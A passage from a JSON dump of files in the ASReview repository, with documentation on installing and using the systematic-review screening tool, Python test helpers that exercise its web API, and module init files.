with ASReview LAB by following\nthese steps:\n\n1. Create a dataset with potentially relevant records you want to screen systematically. Improve the `quality of the data <https://www.asreview.ai/blog/the-importance-of-abstracts>`__ and specify clear reviewing (inclusion/exclusion) criteria\n2. Specify a `stopping criterion <https://www.github.com/asreview/asreview/discussions/557>`__\n3. :doc:`start`\n4. :doc:`project_create`\n5. :ref:`Import your dataset <project_create:Add dataset>`\n6. :ref:`project_create:Select Prior Knowledge`\n7. Select the four components of the :ref:`Active learning model <project_create:Model>` (feature extractor, classifier, balancing method, query strategy)\n8. Wait until the warm up of the AI is ready (the software is extracting the features and trains the classifier on the prior knowledge)\n9. Start :doc:`screening` until you reach your `stopping criterion <https://www.github.com/asreview/asreview/discussions/557>`__\n10. At any time, you can export the :term:`dataset` the labeling decisions or the entire :term:`project`.\n\n\nQuick start\n-----------\n\n1. Check if Python 3.8 or later is installed (if not, `install Python <https://www.python.org/downloads>`__)\n\n.. code:: bash\n\n python --version\n\n2. Install ASReview LAB\n\n.. code:: bash\n\n pip install asreview\n\n3. Open ASReview LAB\n\n.. code:: bash\n\n asreview lab\n\n4. Click *Create* to create a project\n\n5. Select a mode (Oracle, Exploration, Simulation)\n\n6. Name the project, and if you want, add an author name(s) and type a description\n\n7. Import a dataset you want to review, or select a benchmark dataset (only available for the Exploration and Simulation mode)\n\n8. Add prior knowledge. Select at least 1 relevant and 1 irrelevant record to warm up the AI. You can search for a specific record or request random records\n\n9. Select the four components of the active learning model, or rely on the default settings that have shown fast and excellent performance in many simulation studies\n\n10. ASReview LAB starts extracting the features and runs the classifier with the prior knowledge\n\nYou’re ready to start labeling your data! All your labeling actions are\nautomatically saved, so there is no need to click the save button (we don’t\neven have one).\n\n\n\nASReview LAB terminology\n------------------------\n\nWhen you do text screening for a systematic review in ASReview LAB, it can be\nuseful to know some basic concepts about systematic reviewing and machine\nlearning to understand. The following overview describes some terms you might\nencounter as you use ASReview LAB.\n\n.. glossary::\n\n Active learning model\n An active learning model is the combination of four elements: a feature\n extraction technique, a classifier, a balance, and a query strategy.\n\n ASReview\n ASReview stands for *Active learning for Systematic Reviews* or\n *AI-assisted Systematic Reviews*, depending on context. Avoid this\n explanation, only use as tagline.\n\n ASReview CLI\n ASReview CLI is the command line interface that is developed for advanced\n options or for running simulation studies.\n\n Data\n Data includes :term:`dataset`, prior knowledge, labels, and\n :term:`notes<note>`.\n\n Dataset\n A dataset is the collection of :term:`records<record>` that the :term:`user`\n :term:`imports<import>` and :term:`exports<export>`.\n\n ELAS\n ELAS stands for \"Electronic Learning Assistant\". It is the name of\n :term:`ASReview` mascot. It is used for storytelling and to increase\n explainability.\n\n Export\n Export is the action of exporting a :term:`dataset` or a :term:`project`\n from ASReview LAB.\n\n Extension\n An extension is the additional element to the ASReview LAB, such as\n the `ASReview Datatools <https://github.com/asreview/asreview-datatools>`__\n extension.\n\n Import\n Import is the action of importing a :term:`dataset` or a :term:`project`\n into ASReview LAB.\n\n Model configuration\n Model configuration is the action of the :term:`user` to configure the\n :term:`active learning model`.\n\n Note\n A note is the information added by the :term:`user` in the note field and\n stored in the :term:`project file`. It can be edited on the History page.\n\n Project\n A project is a project created in ASReview LAB.\n\n Projects dashboard\n The project dashboard is the landing page containing an overview of all\n :term:`projects<project>` in ASReview LAB.\n\n Project file\n The project file is the ``.asreview`` file containing the :term:`data` and\n :term:`model configuration`. The file is :term:`exported<export>` from\n ASReview LAB and can be :term:`imported<import>` back.\n\n Project mode\n the project mode includes oracle, simulation, and exploration in\n ASReview LAB:\n\n **Oracle** mode is used when a :term:`user` reviews a :term:`dataset`\n systematically with interactive artificial intelligence (AI).\n\n **Exploration** mode is used when a user explores or demonstrates ASReview\n LAB with a completely labeled dataset. This mode is suitable for teaching\n purposes.\n\n **Simulation** mode is used when a user simulates a review on a completely\n labeled dataset to see the performance of ASReview LAB.\n\n Status\n The project status is the stage that a :term:`project` is at in\n ASReview LAB.\n\n **Setup** refers to the fact that the :term:`user` adds project information,\n :term:`imports<import>` the :term:`dataset`, selects the prior knowledge,\n :term:`configures the model<Model configuration>` and initiates the first\n iteration of :term:`model<Active learning model>` training.\n\n **In Review** refers to the fact that in oracle or exploration mode,\n the user adds labels to :term:`records<record>`, or in simulation mode, the\n simulation is running.\n\n **Finished** refers to the fact that in oracle or exploration mode, the user\n decides to complete the :term:`reviewing` process or has labeled all the\n records, or in simulation mode, the simulation has been completed.\n\n **Published** refers to the fact that the user publishes the dataset and\n :term:`project file` in a repository, preferably with a Digital Object\n Identifier (DOI).\n\n Record\n A record is the data point that needs to be labeled. A record can contain\n both information that is used for training the\n :term:`active learning model`, and information that is not used for this\n purpose.\n\n In the case of systematic reviewing, a record is meta-data for a scientific\n publication. Here, the information that is used for training purposes is\n the text in the title and abstract of the publication. The information that\n is not used for training typically consists of other metadata, for example,\n the authors, journal, or DOI of the publication.\n\n Reviewing\n Reviewing is the decision-making process on the relevance of\n :term:`records<record>` (“irrelevant” or “relevant”). It is interchangeable\n with Labeling, Screening, and Classifying.\n\n User\n The human annotator is the person who labels :term:`records<record>`.\n\n Screener\n Replacement term when the context is PRISMA-based reviewing.\n\n\n\nKey principles\n--------------\n\nThe use of ASReview LAB comes with `five fundamental principles\n<https://asreview.ai/blog/the-zen-of-elas/>`_:\n\n1. Humans are the oracle;\n2. Code is open & results are transparent;\n3. Decisions are unbiased;\n4. The interface shows an AI is at work;\n5. Users are responsible for importing high quality data.\n\n\nPrivacy\n-------\n\nThe ASReview LAB software doesn't collect any information about the usage or\nits user. Great, isn't it!\n" }, { "alpha_fraction": 0.761904776096344, "alphanum_fraction": 0.761904776096344, "avg_line_length": 62, "blob_id": "43c73b1e664b22163201cda16cef57ee08a4504a", "content_id": "532e4aa0e9280da5ce99e54e08cb0a1b4756a0db", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 441, "license_type": "permissive", "max_line_length": 70, "num_lines": 7, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/index.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "export { default as AcceptanceDialog } from \"./AcceptanceDialog\";\nexport { default as ConfirmationDialog } from \"./ConfirmationDialog\";\nexport { default as EndCollaboration } from \"./EndCollaboration\";\nexport { default as DialogHeader } from \"./DialogHeader\";\nexport { default as InvitationContents } from \"./InvitationComponent\";\nexport { default as TeamPage } from \"./TeamPage\";\nexport { default as UserListEntry } from \"./UserListEntry\";\n" }, { "alpha_fraction": 0.6519800424575806, "alphanum_fraction": 0.6527668237686157, "avg_line_length": 29.261905670166016, "blob_id": "a5b24ddaa39033ccd538c5008648b285e3837714", "content_id": "58b1aed401a57557334059d82b49652c52215eb6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3813, "license_type": "permissive", "max_line_length": 88, "num_lines": 126, "path": "/asreview/webapp/tests/utils/misc.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import io\nimport json\nimport random\nimport re\nfrom pathlib import Path\nfrom typing import Union\nfrom urllib.request import urlopen\n\nimport requests\nfrom flask import current_app\n\nfrom asreview.project import ASReviewProject\nfrom asreview.utils import asreview_path\n\n\ndef current_app_is_authenticated():\n return current_app.config.get(\"AUTHENTICATION_ENABLED\")\n\n\ndef get_project_id(project):\n \"\"\"Get a project id from either a Project model\n (authenticated app) or an ASReviewProject object\n (unauthenticated app).\"\"\"\n id = None\n if current_app_is_authenticated():\n id = project.project_id\n else:\n id = project.config[\"id\"]\n return id\n\n\ndef read_project_file(project):\n \"\"\"Loads the data from the project.json file.\"\"\"\n id = get_project_id(project)\n with open(asreview_path() / id / \"project.json\", \"r\") as f:\n data = json.load(f)\n return data\n\n\ndef manipulate_project_file(project, key, value):\n \"\"\"Updates key value pairs in the project.json file.\"\"\"\n id = get_project_id(project)\n data = read_project_file(project)\n data[key] = value\n with open(asreview_path() / id / \"project.json\", \"w+\") as f:\n json.dump(data, f)\n return True\n return False\n\n\ndef _extract_stem(path: Union[str, Path]):\n \"\"\"Extracts a stem from a path or URL containing a filename.\"\"\"\n return Path(re.split(\":|/\", str(path))[-1]).stem\n\n\ndef extract_filename_stem(upload_data):\n \"\"\"Helper function to get the stem part of a filename from a\n Path or URL contaning a filename.\"\"\"\n # upload data is a dict with a single key value pair\n value = list(upload_data.values())[0]\n # split this value on either / or :\n return _extract_stem(value)\n\n\ndef choose_project_algorithms():\n \"\"\"Randomly chooses a model plus the appropriate feature\n extraction, query strategy and balance strategy.\"\"\"\n model = random.choice([\"svm\", \"nb\", \"logistic\"])\n feature_extraction = random.choice([\"tfidf\"])\n data = {\n \"model\": model,\n \"feature_extraction\": feature_extraction,\n \"query_strategy\": random.choice(\n [\"cluster\", \"max\", \"max_random\", \"max_uncertainty\", \"random\", \"uncertainty\"]\n ),\n \"balance_strategy\": random.choice([\"double\", \"simple\", \"undersample\"]),\n }\n return data\n\n\ndef retrieve_project_url_github(version=None):\n \"\"\"Retrieve .asreview file(s) url from asreview-project-files-testing\n GitHub repository. When version is not None, the function resturns\n a single URL, otherwise a list containing URLs.\"\"\"\n\n repo = \"asreview/asreview-project-files-testing\"\n repo_api_url = f\"https://api.github.com/repos/{repo}/git/trees/master\"\n repo_url = f\"https://github.com/{repo}/blob/master\"\n file_type = \"startreview.asreview?raw=true\"\n\n json_file = json.loads(urlopen(repo_api_url).read().decode(\"utf-8\"))[\"tree\"]\n\n version_tags = []\n project_urls = []\n\n for file in json_file:\n if file[\"type\"] == \"tree\":\n version_tags.append(file[\"path\"])\n\n for tag in version_tags:\n file_version = f\"/{tag}/asreview-project-{tag.replace('.', '-')}-\"\n url = repo_url + file_version + file_type\n\n if version is None:\n project_urls.append(url)\n else:\n return url\n\n return project_urls\n\n\ndef copy_github_project_into_asreview_folder(url):\n \"\"\"This function copies a, on Github stored, ASReview project\n into the asreview folder.\"\"\"\n response = requests.get(url)\n return ASReviewProject.load(\n io.BytesIO(response.content),\n asreview_path(),\n safe_import=True\n )\n\n\ndef get_folders_in_asreview_path():\n \"\"\"This function returns the amount of folders located\n in the asreview folder.\"\"\"\n return [f for f in asreview_path().glob(\"*\") if f.is_dir()]\n" }, { "alpha_fraction": 0.730869710445404, "alphanum_fraction": 0.7316162586212158, "avg_line_length": 28.119565963745117, "blob_id": "cbb68f66979688ee48bb0f69b289752c480bac92", "content_id": "fd70108af1a749bad535b7edb7eba2cc9bc9c05e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2679, "license_type": "permissive", "max_line_length": 110, "num_lines": 92, "path": "/docs/source/troubleshooting.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Troubleshooting\n===============\n\nASReview LAB is advanced machine learning software. In some situations, you\nmight run into unexpected behavior. See below for solutions to\nproblems.\n\nUnknown Command \"pip\"\n---------------------\n\nThe command line returns one of the following messages:\n\n.. code:: bash\n\n -bash: pip: No such file or directory\n\n.. code:: bash\n\n 'pip' is not recognized as an internal or external command, operable program or batch file.\n\n\nFirst, check if Python is installed with the following command:\n\n.. code:: bash\n\n python --version\n\nIf this doesn't return 3.7 or higher, then Python isn't or not correctly\ninstalled.\n\nMost likely, the environment variables aren't configured correctly. Follow\nthe step-by-step installation instruction on the ASReview website (`Windows <https://asreview.ai/download/>`__\nand `MacOS <https://asreview.ai/download/>`__).\n\nHowever, there is a simple way to deal with correct environment variables\nby adding `python -m` in front of the command. For example:\n\n.. code:: bash\n\n python -m pip install asreview\n\n\nUnknown command \"asreview\"\n--------------------------\n\nIn some situations, the entry point \"asreview\" can not be found after installation.\nFirst check whether the package is correctly installed. Do this with the command\n`python -m asreview -h`. If this shows a decryption of the program, use\n`python -m` in front of all your commands. For example:\n\n.. code-block:: bash\n\n python -m asreview lab\n\n\nBuild dependencies error\n------------------------\n\nThe command line returns the following message:\n\n.. code:: bash\n\n \"Installing build dependencies ... error\"\n\nThis error typically happens when the version of your Python installation has been\nreleased very recently. Because of this, the dependencies of ASReview are not\ncompatible with your Python installation yet. It is advised to install\nthe second most recent version of Python instead. Detailed step-by-step instructions\nto install Python (and ASReview) are available for\n`Windows <https://asreview.ai/download/>`__ and\n`MacOS <https://asreview.ai/download/>`__ users.\n\nRemove temporary files\n----------------------\n\nIn case ASReview runs into unexpected errors or doesn't work as expected, it\nis advised to try to remove temporary files from the project first. These\nfiles can be found in the ``.asreview/`` folder in your home directory.\nHowever, the easiest way to remove these files is with:\n\n.. code:: bash\n\n asreview lab --clean-all-projects\n\nThis will safely remove temporary files, nothing will harm your review. To\nclean a specific project, use\n\n.. code:: bash\n\n asreview lab --clean-project my-project\n\nin which ``my_project`` is your project name.\n" }, { "alpha_fraction": 0.6899551749229431, "alphanum_fraction": 0.7092011570930481, "avg_line_length": 24.62837791442871, "blob_id": "fda2add5dabd1f3beb4d68effd22552690a93f4d", "content_id": "830cbdb41a881c2c51f7347000806024f86a854b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3793, "license_type": "permissive", "max_line_length": 171, "num_lines": 148, "path": "/docs/source/installation.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Installation\n============\n\nInstall ASReview\n----------------\n\nASReview software requires an installation of Python 3.8 or later. Detailed\nstep-by-step instructions to install Python (and ASReview) are available for\n`Windows <https://asreview.ai/download>`__ and\n`macOS/Linux <https://asreview.ai/download/>`__ users.\n\nInstall the ASReview software with Pip by running the following command in the\n`CMD.exe` (Windows) or `Terminal` (MacOS/Linux):\n\n.. code:: bash\n\n pip install asreview\n\nStart the application with the following command (in CMD.exe or Terminal):\n\n.. code:: bash\n\n asreview lab\n\nThe ASReview LAB software starts in the browser. For more options on starting\nASReview LAB, see :doc:`start`.\n\n.. note::\n\n See :doc:`troubleshooting` for common problems during installation.\n\n.. tip::\n\n For users with Apple M1 computers, if you experience problems, follow the\n `instructions\n <https://github.com/ghcr.io/asreview/asreview/issues/738#issuecomment-919685562>`__.\n\n\nUpgrade ASReview\n----------------\n\nUpgrade ASReview software with\n\n.. code:: bash\n\n pip install --upgrade asreview\n\n\n\nUninstall ASReview\n------------------\n\nRemove ASReview with\n\n.. code:: bash\n\n pip uninstall asreview\n\nEnter ``y`` to confirm.\n\n.. warning::\n\n Note that your project files will **not** delete with this action. You find them in the `.asreview` folder in your home folder.\n\nServer Installation\n-------------------\n\nIt is possible to run the ASReview software on a server or custom domain. Use\nthe flags `ip` and `port` for configuration. ASReview should only be used in\nclosed networks.\n\n.. code:: bash\n\n asreview lab --port 5555 --ip xxx.x.x.xx\n\n.. warning::\n\n Don't use the development server in production. Read the Flask documentation\n about `deploying a Flask app to production <https://flask.palletsprojects.com/en/1.1.x/tutorial/deploy/>`__.\n\n\nInstall with Docker\n-------------------\n\nASReview is also available as a Docker container. Make sure you have\nDocker installed on your machine.\n\nTo install and start ASReview LAB at http://localhost:5000, run the following:\n\n.. code:: bash\n\n docker run -p 5000:5000 ghcr.io/asreview/asreview:latest lab\n\n\nMore advanced command line options can be given\nafterward, like this:\n\n.. code:: bash\n\n docker run -p 9000:9000 ghcr.io/asreview/asreview lab --port 9000\n\n.. tip::\n\n ASReview LAB is now installed. Open the URL in your host web browser:\n ``http://localhost:5000`` and get started.\n\n\nMount local volume\n~~~~~~~~~~~~~~~~~~\n\nTo mount the container to your local project folder (or any other local\nfolder), the `-v` flag can be used. To do so, adjust path-to-your-folder to\nyour local folder. When a project folder is specified, ASReview LAB will store\nand load all its projects from this folder. Note that multiple containers can\naccess the same folder.\n\n.. code:: bash\n\n docker run -p 5000:5000 -v path-to-your-folder:/project_folder ghcr.io/asreview/asreview lab\n\nNamed container\n~~~~~~~~~~~~~~~\n\nTo make the usage easier, you can create a named container like the following:\n\n.. code:: bash\n\n docker create --name asreview-lab -p 5000:5000 -v path-to-your-folder:/project_folder ghcr.io/asreview/asreview lab\n\nTo start asreview, enter:\n\n.. code:: bash\n\n docker start asreview\n\nTo stop it, just use `stop` instead of `start`.\nYou can also check which images are running with `docker ps`.\n\nCustomize the image\n~~~~~~~~~~~~~~~~~~~\n\nIf you want to add more extensions, or build the Docker image yourself, check the file `Dockerfile <https://github.com/ghcr.io/asreview/asreview/tree/master/Dockerfiles>`.\nModify it as you see fit, and then build and run the image with:\n\n.. code:: bash\n\n docker build -t asreview/asreview:custom .\n docker run -p 5000:5000 ghcr.io/asreview/asreview:custom lab\n" }, { "alpha_fraction": 0.667323112487793, "alphanum_fraction": 0.6679291129112244, "avg_line_length": 27.330472946166992, "blob_id": "deb24cacc8e6dae716e23a91bccb4f384a5a36f6", "content_id": "af3ce1991fc9e3f4d238f8af8a6a3e61118f1fc9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13202, "license_type": "permissive", "max_line_length": 87, "num_lines": 466, "path": "/asreview/webapp/tests/utils/api_utils.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import random\nimport time\nfrom io import BytesIO\nfrom typing import Union\nfrom urllib.request import urlopen\n\nfrom flask.testing import FlaskClient\n\nimport asreview.webapp.tests.utils.crud as crud\nimport asreview.webapp.tests.utils.misc as misc\nfrom asreview.project import ASReviewProject\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.tests.utils.config_parser import all_users\nfrom asreview.webapp.tests.utils.config_parser import get_user\nfrom asreview.webapp.tests.utils.misc import get_project_id\n\n\ndef process_response(response):\n \"\"\"Breaks response in a tuple containing the status code\n and json data.\"\"\"\n return (response.status_code, response.json)\n\n\n# ########################\n# General API calls\n# ########################\n\n\ndef call_root_url(client):\n response = client.get(\"/\")\n status_code, data = process_response(response)\n return (status_code, data, response.text)\n\n\ndef call_boot_url(client):\n response = client.get(\"/boot\")\n return process_response(response)\n\n\n# ########################\n# Authentication API calls\n# ########################\n\n\ndef signin_user(client, user):\n \"\"\"Signs in a user through the api\"\"\"\n # If a password is not set, we need to get it\n if not hasattr(user, \"password\"):\n users = all_users()\n user.password = users[user.identifier].password\n # request\n response = client.post(\n \"/auth/signin\", data={\"email\": user.identifier, \"password\": user.password}\n )\n return process_response(response)\n\n\ndef signup_user(client, user):\n \"\"\"Signs up a user through the api\"\"\"\n response = client.post(\n \"/auth/signup\",\n data={\n \"identifier\": user.email,\n \"email\": user.email,\n \"name\": user.name,\n \"password\": user.password,\n \"affiliation\": user.affiliation,\n \"origin\": \"asreview\",\n },\n )\n return process_response(response)\n\n\ndef signout_user(client):\n \"\"\"Sign out user\"\"\"\n response = client.delete(\"/auth/signout\")\n return process_response(response)\n\n\ndef confirm_user(client, user):\n response = client.post(\n \"/auth/confirm_account\", data={\"user_id\": user.id, \"token\": user.token}\n )\n return process_response(response)\n\n\ndef forgot_password(client, user):\n response = client.post(\"/auth/forgot_password\", data={\"email\": user.email})\n return process_response(response)\n\n\ndef reset_password(client, user):\n response = client.post(\n \"/auth/reset_password\",\n data={\"password\": user.password, \"token\": user.token, \"user_id\": user.id},\n )\n return process_response(response)\n\n\ndef update_user(client, data):\n response = client.post(\"/auth/update_profile\", data=data)\n return process_response(response)\n\n\ndef refresh(client):\n response = client.get(\"/auth/refresh\")\n return process_response(response)\n\n\ndef get_profile(client: FlaskClient):\n response = client.get(\"/auth/get_profile\")\n return process_response(response)\n\n\n# ########################\n# Teams API calls\n# ########################\n\n\ndef invite(client, project, user):\n url = f\"/api/invitations/projects/{get_project_id(project)}/users/{user.id}\"\n response = client.post(url)\n return process_response(response)\n\n\ndef list_invitations(client):\n response = client.get(\"/api/invitations\")\n return process_response(response)\n\n\ndef list_collaborators(client, project):\n response = client.get(f\"/api/projects/{get_project_id(project)}/users\")\n return process_response(response)\n\n\ndef accept_invitation(client, project):\n response = client.post(\n f\"/api/invitations/projects/{get_project_id(project)}/accept\", data={}\n )\n return process_response(response)\n\n\ndef reject_invitation(client, project):\n response = client.delete(\n f\"/api/invitations/projects/{get_project_id(project)}/reject\", data={}\n )\n return process_response(response)\n\n\ndef delete_invitation(client, project, user):\n response = client.delete(\n f\"/api/invitations/projects/{get_project_id(project)}/users/{user.id}\", data={}\n )\n return process_response(response)\n\n\ndef delete_collaboration(client, project, user):\n response = client.delete(\n f\"/api/projects/{get_project_id(project)}/users/{user.id}\", data={}\n )\n return process_response(response)\n\n\n# ########################\n# Project API calls\n# ########################\n\n\ndef get_all_projects(client: FlaskClient):\n response = client.get(\"/api/projects\")\n return process_response(response)\n\n\ndef create_project(\n client: FlaskClient,\n project_name: str,\n mode: str = \"explore\",\n authors: str = \"authors\",\n description: str = \"description\",\n):\n response = client.post(\n \"/api/projects/info\",\n data={\n \"mode\": mode,\n \"name\": project_name,\n \"authors\": authors,\n \"description\": description,\n },\n )\n return process_response(response)\n\n\ndef create_project_from_dict(client: FlaskClient, data: dict):\n response = client.post(\n \"/api/projects/info\",\n data=data,\n )\n return process_response(response)\n\n\ndef update_project(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n name: str = \"name\",\n mode: str = \"explore\",\n authors: str = \"authors\",\n description: str = \"description\",\n):\n response = client.put(\n f\"/api/projects/{get_project_id(project)}/info\",\n data={\n \"mode\": mode,\n \"name\": name,\n \"authors\": authors,\n \"description\": description,\n },\n )\n return process_response(response)\n\n\ndef upgrade_project(client: FlaskClient, project: Union[Project, ASReviewProject]):\n response = client.get(f\"/api/projects/{get_project_id(project)}/upgrade_if_old\")\n return process_response(response)\n\n\ndef import_project(client: FlaskClient, url: str):\n with urlopen(url) as project_file:\n response = client.post(\n \"/api/projects/import_project\",\n data={\"file\": (BytesIO(project_file.read()), \"project.asreview\")},\n )\n return process_response(response)\n\n\ndef get_project_stats(client: FlaskClient):\n response = client.get(\"/api/projects/stats\")\n return process_response(response)\n\n\ndef get_demo_data(client: FlaskClient, subset: str):\n response = client.get(f\"/api/datasets?subset={subset}\")\n return process_response(response)\n\n\ndef upload_data_to_project(\n client: FlaskClient, project: Union[Project, ASReviewProject], data: dict\n):\n response = client.post(\n f\"/api/projects/{get_project_id(project)}/data\",\n data=data,\n )\n return process_response(response)\n\n\ndef get_project_data(client: FlaskClient, project: Union[Project, ASReviewProject]):\n response = client.get(f\"/api/projects/{get_project_id(project)}/data\")\n return process_response(response)\n\n\ndef get_project_dataset_writer(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/dataset_writer\")\n return process_response(response)\n\n\ndef search_project_data(\n client: FlaskClient, project: Union[Project, ASReviewProject], query: str\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/search?q={query}\")\n return process_response(response)\n\n\ndef get_prior_random_project_data(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/prior_random\")\n return process_response(response)\n\n\ndef label_random_project_data_record(\n client: FlaskClient, project: Union[Project, ASReviewProject], label: int\n):\n # get random data\n _, data = get_prior_random_project_data(client, project)\n # select a specific record\n record = random.choice(data[\"result\"])\n doc_id = record[\"id\"]\n return label_project_record(client, project, doc_id, label, note=\"\")\n\n\ndef label_project_record(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n doc_id: int,\n label: str,\n prior: int = 1,\n note: str = \"\",\n):\n response = client.post(\n f\"/api/projects/{get_project_id(project)}/record/{doc_id}\",\n data={\"doc_id\": doc_id, \"label\": label, \"is_prior\": prior, \"note\": note},\n )\n return process_response(response)\n\n\ndef update_label_project_record(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n doc_id: int,\n label: str,\n prior: int = 1,\n note: str = \"\",\n):\n response = client.put(\n f\"/api/projects/{get_project_id(project)}/record/{doc_id}\",\n data={\"doc_id\": doc_id, \"label\": label, \"is_prior\": prior, \"note\": note},\n )\n return process_response(response)\n\n\ndef get_labeled_project_data(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/labeled\")\n return process_response(response)\n\n\ndef get_labeled_project_data_stats(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/labeled_stats\")\n return process_response(response)\n\n\ndef get_project_algorithms_options(client: FlaskClient):\n response = client.get(\"/api/algorithms\")\n return process_response(response)\n\n\ndef set_project_algorithms(\n client: FlaskClient, project: Union[Project, ASReviewProject], data: dict\n):\n response = client.post(\n f\"/api/projects/{get_project_id(project)}/algorithms\", data=data\n )\n return process_response(response)\n\n\ndef get_project_algorithms(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/algorithms\")\n return process_response(response)\n\n\ndef start_project_algorithms(\n client: FlaskClient, project: Union[Project, ASReviewProject]\n):\n response = client.post(f\"/api/projects/{get_project_id(project)}/start\")\n return process_response(response)\n\n\ndef get_project_status(client: FlaskClient, project: Union[Project, ASReviewProject]):\n response = client.get(f\"/api/projects/{get_project_id(project)}/status\")\n return process_response(response)\n\n\ndef set_project_status(\n client: FlaskClient, project: Union[Project, ASReviewProject], status: str\n):\n response = client.put(\n f\"/api/projects/{get_project_id(project)}/status\", data={\"status\": status}\n )\n return process_response(response)\n\n\ndef export_project_dataset(\n client: FlaskClient, project: Union[Project, ASReviewProject], format: str\n):\n id = get_project_id(project)\n response = client.get(f\"/api/projects/{id}/export_dataset?file_format={format}\")\n return process_response(response)\n\n\ndef export_project(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/export_project\")\n return process_response(response)\n\n\ndef get_project_progress(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/progress\")\n return process_response(response)\n\n\ndef get_project_progress_density(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/progress_density\")\n return process_response(response)\n\n\ndef get_project_progress_recall(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/progress_recall\")\n return process_response(response)\n\n\ndef get_project_current_document(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.get(f\"/api/projects/{get_project_id(project)}/get_document\")\n return process_response(response)\n\n\ndef delete_project(\n client: FlaskClient,\n project: Union[Project, ASReviewProject],\n):\n response = client.delete(f\"/api/projects/{get_project_id(project)}/delete\")\n return process_response(response)\n\n\n# ########################\n# General procedures\n# ########################\n\n\ndef create_and_signin_user(client, test_user_id=1):\n \"\"\"Creates a user account and signs in with that account.\"\"\"\n # signup user\n user = get_user(test_user_id)\n signup_user(client, user)\n # refresh user\n stored_user = crud.get_user_by_identifier(user.identifier)\n # signin user\n signin_user(client, user)\n # return the user\n return stored_user\n\n\ndef upload_label_set_and_start_model(client, project, dataset):\n \"\"\"Uploads a dataset to a created project and adds and starts\n a random model.\"\"\"\n # upload dataset\n upload_data_to_project(client, project, data=dataset)\n # label 2 random records\n label_random_project_data_record(client, project, 1)\n label_random_project_data_record(client, project, 0)\n # select a model\n model_data = misc.choose_project_algorithms()\n set_project_algorithms(client, project, data=model_data)\n # start the model\n start_project_algorithms(client, project)\n # make sure model is done\n time.sleep(10)\n" }, { "alpha_fraction": 0.8097826242446899, "alphanum_fraction": 0.8192934989929199, "avg_line_length": 48.06666564941406, "blob_id": "fb3697aa0dfc2a68300e758cf5cd80cc6e6aba84", "content_id": "8571381dcfd828bdf7a1e061ca91144dae9f052e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1472, "license_type": "permissive", "max_line_length": 74, "num_lines": 30, "path": "/asreview/models/classifiers/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom asreview.models.classifiers.logistic import LogisticClassifier\nfrom asreview.models.classifiers.lstm_base import LSTMBaseClassifier\nfrom asreview.models.classifiers.lstm_pool import LSTMPoolClassifier\nfrom asreview.models.classifiers.nb import NaiveBayesClassifier\nfrom asreview.models.classifiers.nn_2_layer import NN2LayerClassifier\nfrom asreview.models.classifiers.rf import RandomForestClassifier\nfrom asreview.models.classifiers.svm import SVMClassifier\nfrom asreview.models.classifiers.utils import get_classifier\nfrom asreview.models.classifiers.utils import get_classifier_class\nfrom asreview.models.classifiers.utils import list_classifiers\n\n\"\"\"Machine learning classifiers to classify the documents.\n\nThere are several machine learning classifiers available. In configuration\nfiles, parameters are found under the section ``[model_param]``.\n\"\"\"\n" }, { "alpha_fraction": 0.7986754775047302, "alphanum_fraction": 0.8066225051879883, "avg_line_length": 46.1875, "blob_id": "04be3931c4227c7fc815436403c0021728886eff", "content_id": "d96096d9f1b8ecb85a8582bcf39667c146c654dc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "permissive", "max_line_length": 74, "num_lines": 32, "path": "/asreview/models/balance/__init__.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the 